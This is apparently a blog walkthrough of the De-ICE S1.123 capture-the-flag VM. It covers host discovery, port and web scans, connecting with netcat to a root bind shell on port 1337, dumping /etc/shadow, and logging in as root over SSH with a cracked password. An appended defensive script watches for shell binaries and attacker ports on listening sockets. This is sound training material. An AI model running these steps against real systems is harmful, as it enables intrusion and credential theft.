I did not find this one on an old hard drive; the only thing I had was the link to the ISO and two empty text files. So this is basically a clean, up-to-date walkthrough using Kali. This one was short and sweet, not too many flags to deal with. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.123.iso
Default IP: Hey, Look at flag one slacker
1. Find default IP for system
2. Enumerate ports and services
3. Identify web and network vulnerabilities for system
4. Gain root access to system
Spoilers and Walkthrough
We have used a few different tools to find hosts on a subnet and we will add another one for this test. ARP (Address Resolution Protocol) maps physical MAC addresses to the corresponding IP addresses on a network; because it isn’t routed, it is useful for finding systems on the local segment. There are multiple tools that use ARP for this discovery, but I have chosen arp-scan because it is already installed in Kali and I knew the switch to use.
root@kali:~# arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1     00:50:56:c0:00:08       VMware, Inc.
192.168.1.2     00:50:56:e7:84:3f       VMware, Inc.
192.168.1.123   00:0c:29:1f:c6:f0       VMware, Inc.
192.168.1.254   00:50:56:e7:f4:91       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.420 seconds (105.79 hosts/sec). 4 responded
Now that we know it is the .123 address, let’s port scan the image to get started. Once again, we will use the Metasploit console to keep all of our info in one place.
msfconsole
workspace -a de-ice123
workspace de-ice123
db_nmap -T5 -A -p 0-65535 192.168.1.123
That is a lot to work with, so let’s narrow it down a bit and get started with some information gathering. Finger will expose user names and there is a simple scanner for it already built into Metasploit.
use auxiliary/scanner/finger/finger_users
[*] 192.168.1.123:79 - 192.168.1.123:79 No users found.
That didn’t go as well as I had hoped. Let’s look at a list of other open ports.
services
192.168.1.123   901   tcp   http   open   Samba SWAT administration server
Unfortunately, that is behind HTTP basic authentication and we don’t have any credentials to test yet. A little research shows that by default it uses the root account and password for credentials. We can put that in the pile for a brute force attack later. Why am I showing you all of this stuff that doesn’t work? Because welcome to penetration testing. 99% of the things that you find, research, or try will be dead ends. That super sweet exploit the scanner found will either be a false positive or the local AV will eat the exploit and no amount of encryption and obfuscation will work. But the research you do today about the finger service will pay off in three months when you run into it on another system.
Let’s look at the DokuWiki listening on port 80 and see if we can web app pen test this thing. I don’t want to copy all of the results here, but I will paste the command and a few things that piqued my interest.
nikto -h 192.168.1.123
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
I couldn’t validate the /bin system shell, but one of you smart web app people will probably get that. Manually looking through those pages with a browser might give you an idea of a few things that we will do later on. Since we have already used Nmap we can check that one off the list. I will use sqlmap next since we might be able to inject the ?id= parameter. Using the wizard isn’t 1337 H4x0r, but it is an easy test so there is no reason to use Burp to capture a request.
root@kali:~# sqlmap --wizard
[22:43:57] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.1.123/doku.php?id=netcat
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 3
No luck, so if there is a SQL injection it is more obscure or needs some additional testing. Since the wiki talks about netcat, let’s see if that is a hint. There are two interesting ports to look at based on their numbering: 1337 and 31337. As a penetration tester, DON’T DO THIS. Don’t try to be clever and show you are an elite hacker; also change the default port on your meterpreter shells. Be professional: 4444 and 1337 raise a lot of red flags on an IDS that 8080 and 8443 won’t. For readability I’ve bolded my command inputs.
root@kali:~# nc -vv 192.168.1.123 1337
192.168.1.123: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.123] 1337 (?) open
id
uid=0(root) gid=0(root)
cd ..
ls
bin dev etc home lib mnt opt proc root sbin sys tmp usr var
cd ..
pwd
/
cd etc
cat shadow
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
cat passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
Let’s validate that we have SSH access after reversing that hash. You already reversed that hash with John, right?
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.128:36105 -> 192.168.1.123:22) at 2017-04-13 23:34:37 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...
We are root on the system through a netcat shell. On a real penetration test this would be a bad finding; this is where you actually stop testing and call your contact to tell them someone else has compromised their systems. Could it be a really bad system administrator who decided that adding a wildly unsecured access method was a good idea? Yes. Could it be a malicious attack? Yes. In this case you would grab a screenshot for your report and send up a flare to your client. Who knows, maybe you will get extra billable hours to clean it off.
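The port advice earlier and this finding come down to one question a defender should be asking of every host: is anything listening that hands a shell to whoever connects? The script below is an added example, not part of the original walkthrough, that scores listeners from ss -lntpe-shaped output. The SAMPLE lines are constructed, the field layout is assumed to match that ss invocation, and the port and binary watchlists are my own choices built from the ports this post names.

```python
"""Flag listeners that look like the root bind shell above; SAMPLE is constructed ss -lntpe-shaped output."""
import re

SUSPECT_PORTS = {1337, 31337, 4444}  # conventions the walkthrough says trip IDS rules
# Shell binaries have no business owning a listening socket; this also catches one parked on 8080/8443.
SHELL_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "sh", "bash", "dash"}
LINE_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+\S+:(?P<port>\d+)\s+\S+'
    r'.*?users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+).*?uid:(?P<uid>\d+)')

def parse_listeners(ss_output):
    """Return one dict (port, proc, pid, uid) per LISTEN line the regex matches."""
    found = []
    for line in ss_output.splitlines():
        m = LINE_RE.search(line.strip())
        if m:
            d = m.groupdict()
            d.update(port=int(d["port"]), pid=int(d["pid"]), uid=int(d["uid"]))
            found.append(d)
    return found

def bind_shell_reasons(l):
    """List the indicators that make one listener look like a bind shell."""
    reasons = []
    if l["proc"] in SHELL_BINARIES:
        reasons.append("shell/netcat binary owns a listening socket")
    if l["port"] in SUSPECT_PORTS:
        reasons.append("port %d is a well-known attacker convention" % l["port"])
    if reasons and l["uid"] == 0:
        reasons.append("owned by uid 0, so a connection yields a root shell")
    return reasons

def find_bind_shells(ss_output):
    """Return [(port, proc, pid, reasons)] for every suspicious listener."""
    hits = []
    for l in parse_listeners(ss_output):
        reasons = bind_shell_reasons(l)
        if reasons:
            hits.append((l["port"], l["proc"], l["pid"], reasons))
    return hits

SAMPLE = """\
LISTEN 0      128    0.0.0.0:22        0.0.0.0:*         users:(("sshd",pid=812,fd=3)) uid:0 ino:1 sk:1
LISTEN 0      50     0.0.0.0:80        0.0.0.0:*         users:(("httpd",pid=901,fd=4)) uid:80 ino:2 sk:2
LISTEN 0      1      0.0.0.0:1337      0.0.0.0:*         users:(("nc",pid=1450,fd=3)) uid:0 ino:3 sk:3
LISTEN 0      1      0.0.0.0:8443      0.0.0.0:*         users:(("bash",pid=2204,fd=5)) uid:0 ino:4 sk:4
"""
if __name__ == "__main__":
    for port, proc, pid, reasons in find_bind_shells(SAMPLE):
        print("port %d (%s, pid %d): %s" % (port, proc, pid, "; ".join(reasons)))
```

The 8443 line is there on purpose: a shell moved off 1337 to a "professional" port is still caught by the binary check, which is why the port list alone is not enough.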
I dug around on the rest of the system looking for other flags but didn’t find any data to manipulate. Based on the age of the PHP and Apache install, there are probably lots of vulnerabilities that can be exploited on this system.